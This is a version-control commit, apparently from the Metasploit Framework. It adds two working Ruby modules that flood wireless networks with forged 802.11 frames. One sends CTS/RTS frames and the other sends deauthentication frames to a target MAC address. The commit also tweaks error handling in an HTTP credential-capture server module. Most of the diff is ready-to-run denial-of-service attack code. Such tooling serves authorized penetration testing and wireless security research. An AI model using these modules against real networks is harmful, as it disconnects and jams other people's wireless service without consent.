Add the CTS/RTS and DEAUTH modules. Improve HTTP capture module error handling

git-svn-id: file:///home/svn/framework3/trunk@5483 4d416f70-5f16-0410-b530-b9f4589650da
2008-04-21 05:41:53 +00:00 · 2008-04-21 05:41:53 +00:00 · 3cdb74e572
parent 82330fff7e
commit 3cdb74e572
3 changed files with 141 additions and 2 deletions
--- a/modules/auxiliary/dos/wireless/cts_rts_flood.rb
+++ b/modules/auxiliary/dos/wireless/cts_rts_flood.rb
@ -0,0 +1,76 @@
+require 'msf/core'
+
+module Msf
+class Auxiliary::Dos::Wireless::CTSRTSFLOOD < Msf::Auxiliary
+
+	include Exploit::Lorcon
+
+	def initialize(info ={})
+		super(update_info(info,
+			'Name'		=> 'Wireless CTS/RTS Flooder',
+			'Description' 	=> %q{
+	      				This module sends 802.11 CTS/RTS requests to a specific wireless peer,
+					using the specified source address,	
+					},
+			
+			'Author'	=> [ 'Brad Antoniewicz' ],
+			'License'	=> MSF_LICENSE,
+			'Version'	=> '$Revision$'
+				 ))
+		register_options(
+			[
+				OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
+				OptString.new('ADDR_SRC',[false, "Source MAC (not needed for CTS)"]),
+				OptString.new('TYPE',[true,"Type of Frame (RTS, CTS)",'RTS']),
+				OptString.new('NUM',[false, "Number of frames to send",'100'])
+			],self.class)
+	end
+
+	def run
+		case datastore['TYPE'].upcase
+			when 'RTS'
+				if (!datastore['ADDR_SRC'])
+					print_status("FAILED: RTS Flood selected but ADDR_SRC not set!")
+					return
+				end
+				frame = create_rts()
+			when 'CTS'
+
+				frame =create_cts()
+			else 
+				print_status("No TYPE selected!!")
+				return	
+		end
+	
+		open_wifi	
+		print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frame.....")
+
+		0.upto(datastore['NUM'].to_i) do
+			wifi.write(frame)
+		end
+
+	end	
+	def create_rts
+		
+		frame =
+			"\xb4" +			# Type/SubType
+			"\x00" +			# Flags
+			"\xff\x7f" +			# Duration
+			eton(datastore['ADDR_DST']) +	# dst addr
+			eton(datastore['ADDR_SRC'])	# src addr
+
+		return frame
+	end
+	def create_cts
+		
+		frame = 
+			"\xc4" +			# Type/SubType
+			"\x00" +			# Flags
+			"\xff\x7f" +			# Duration
+			eton(datastore['ADDR_DST'])	# dst addr
+
+	     return frame
+	end
+end
+end
+
--- a/modules/auxiliary/dos/wireless/deauth.rb
+++ b/modules/auxiliary/dos/wireless/deauth.rb
@ -0,0 +1,62 @@
+require 'msf/core'
+
+module Msf
+class Auxiliary::Dos::Wireless::DEAUTH_Flood < Msf::Auxiliary
+
+	include Exploit::Lorcon
+
+	def initialize(info ={})
+		super(update_info(info,
+			'Name'		=> 'Wireless DEAUTH Flooder',
+			'Description' 	=> %q{
+	      				This module sends 802.11 DEAUTH requests to a specific wireless peer,
+					using the specified source address and source BSSID.
+					},
+			
+			'Author'	=> [ 'Brad Antoniewicz' ],
+			'License'	=> MSF_LICENSE,
+			'Version'	=> '$Revision$'
+				 ))
+		register_options(
+			[
+				OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
+				OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
+				OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
+				OptString.new('NUM',[false, "Number of frames to send",'100'])
+			],self.class)
+	end
+
+	def run
+			
+		print_status("Creating Deauth frame with the following attributes:")
+		print_status("\tDST: #{datastore['ADDR_DST']}")
+		print_status("\tSRC: #{datastore['ADDR_SRC']}")
+		print_status("\tBSSID: #{datastore['ADDR_BSS']}")
+
+		open_wifi
+
+		print_status("Sending #{datastore['NUM']} frames.....")
+
+		0.upto(datastore['NUM'].to_i) do
+			wifi.write(create_deauth())
+		end
+		close_wifi
+	end	
+	
+	def create_deauth
+		
+		seq = [rand(255)].pack('n')	
+		frame =
+			"\xc0" +			# Type/SubType
+			"\x00" +			# Flags
+			"\x3a\x01" +			# Duration
+			eton(datastore['ADDR_DST']) +	# dst addr
+			eton(datastore['ADDR_SRC']) +	# src addr
+			eton(datastore['ADDR_BSS']) +	# BSSID
+			seq +				# sequence number 
+			"\x07\x00"			# Reason Code (nonassoc. sta)
+		return frame
+	end
+end
+end
+
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@ -70,6 +70,7 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
 	end
 	
 	def on_client_data(cli)
+
 		begin
 			data = cli.get_once(-1, 5)
 			case cli.request.parse(data)
@ -82,12 +83,12 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
 					close_client(cli)
 			end
 		rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
+		rescue ::OpenSSL::SSL::SSLError
 		rescue ::Exception
 			print_status("Error: #{$!.class} #{$!} #{$!.backtrace}")
 		end
 		
-		close_client(cli)
-							
+		close_client(cli)						
 	end

 	def close_client(cli)